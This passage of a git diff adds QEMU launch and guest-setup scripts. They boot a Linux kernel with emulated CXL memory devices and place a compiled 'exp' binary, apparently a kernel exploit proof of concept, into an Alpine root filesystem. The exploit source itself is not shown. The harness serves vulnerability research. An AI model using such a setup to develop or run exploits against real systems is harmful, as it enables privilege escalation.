0; +} diff --git a/qemu/qemu-system-x86_64 b/qemu/qemu-system-x86_64 new file mode 100755 index 0000000..b1e578c Binary files /dev/null and b/qemu/qemu-system-x86_64 differ diff --git a/qemu/run_qemu_shell.sh b/qemu/run_qemu_shell.sh new file mode 100755 index 0000000..f8781ad --- /dev/null +++ b/qemu/run_qemu_shell.sh @@ -0,0 +1,41 @@ +#!/bin/sh +set -eu + +DIR=$(CDPATH= cd -- "$(dirname -- "$0")" && pwd) +TMPDIR=${TMPDIR:-"$DIR/tmp"} +export TMPDIR + +ROOTFS="$DIR/images/alpine" +ROOTFS_GZ="$ROOTFS.gz" + +mkdir -p "$TMPDIR" + +if [ ! -e "$ROOTFS" ]; then + if [ ! -f "$ROOTFS_GZ" ]; then + echo "missing rootfs: $ROOTFS_GZ" >&2 + exit 1 + fi + + ROOTFS_TMP="$ROOTFS.$$" + trap 'rm -f "$ROOTFS_TMP"' EXIT HUP INT TERM + gzip -dc "$ROOTFS_GZ" > "$ROOTFS_TMP" + mv "$ROOTFS_TMP" "$ROOTFS" + trap - EXIT HUP INT TERM +fi + +exec "$DIR/qemu-system-x86_64" \ + -accel tcg \ + -machine q35,cxl=on \ + -m 512M,maxmem=2G,slots=4 \ + -smp 1 \ + -nographic -no-reboot -snapshot \ + -kernel "$DIR/images/vmlinuz-linux" \ + -append "root=/dev/vda rw console=ttyS0,115200 earlycon=uart8250,io,0x3f8,115200 loglevel=8 ignore_loglevel printk.time=1 devtmpfs.mount=1 pci=realloc" \ + -drive file="$ROOTFS",file.locking=off,if=none,format=raw,id=rootfs \ + -device virtio-blk-pci,drive=rootfs \ + -device pxb-cxl,id=cxl.0,bus=pcie.0,bus_nr=52 \ + -device cxl-rp,id=rp0,bus=cxl.0,chassis=0,slot=0 \ + -object memory-backend-ram,id=cxl-mem0,size=256M \ + -object memory-backend-ram,id=dc-mem0,size=256M \ + -device cxl-type3,bus=rp0,volatile-memdev=cxl-mem0,volatile-dc-memdev=dc-mem0,num-dc-regions=1,id=mem0 \ + -M cxl-fmw.0.targets.0=cxl.0,cxl-fmw.0.size=512M diff --git a/qemu/setup_guest.sh b/qemu/setup_guest.sh new file mode 100755 index 0000000..086d679 --- /dev/null +++ b/qemu/setup_guest.sh @@ -0,0 +1,55 @@ +#!/bin/sh +set -eux + +mkdir -p images +mkdir -p poc + +cp /boot/vmlinuz-linux images/vmlinuz-linux +chmod 0755 images/vmlinuz-linux + +curl -L --fail --show-error \ + -o images/alpine-latest-releases.yaml \ + https://dl-cdn.alpinelinux.org/alpine/v3.23/releases/x86_64/latest-releases.yaml + +curl -L --fail --show-error \ + -o images/alpine-minirootfs-3.23.4-x86_64.tar.gz \ + https://dl-cdn.alpinelinux.org/alpine/v3.23/releases/x86_64/alpine-minirootfs-3.23.4-x86_64.tar.gz + +rm -rf alpine_root_fs.tmp +mkdir -p alpine_root_fs.tmp +tar -xzf images/alpine-minirootfs-3.23.4-x86_64.tar.gz -C alpine_root_fs.tmp + +printf '%s\n' \ + https://dl-cdn.alpinelinux.org/alpine/v3.23/main \ + https://dl-cdn.alpinelinux.org/alpine/v3.23/community \ + > alpine_root_fs.tmp/etc/apk/repositories + +rm -f alpine_root_fs.tmp/sbin/init +cat > alpine_root_fs.tmp/sbin/init <<'EOF' +#!/bin/sh + +PATH=/sbin:/bin:/usr/sbin:/usr/bin +export PATH + +mount -t devtmpfs devtmpfs /dev 2>/dev/null || true +mount -t proc proc /proc 2>/dev/null || true +mount -t sysfs sysfs /sys 2>/dev/null || true + +exec /bin/sh /dev/console 2>&1 +EOF +chmod 0755 alpine_root_fs.tmp/sbin/init + +gcc -static -O2 -Wall -Wextra -o exp/exp exp/exp.c + +cp exp/exp alpine_root_fs.tmp/exp +chmod 0755 alpine_root_fs.tmp/exp + +rm -f images/alpine.tmp +truncate -s 128M images/alpine.tmp +mkfs.ext4 -q -F -d alpine_root_fs.tmp images/alpine.tmp + +rm -rf alpine_root_fs +mv alpine_root_fs.tmp alpine_root_fs +mv images/alpine.tmp images/alpine + +echo done diff --git a/qemu/vgabios-stdvga.bin b/qemu/vgabios-stdvga.bin new file mode 100644 index 0000000..5b48ca8 Binary files /dev/null and b/qemu/vgabios-stdvga.bin differ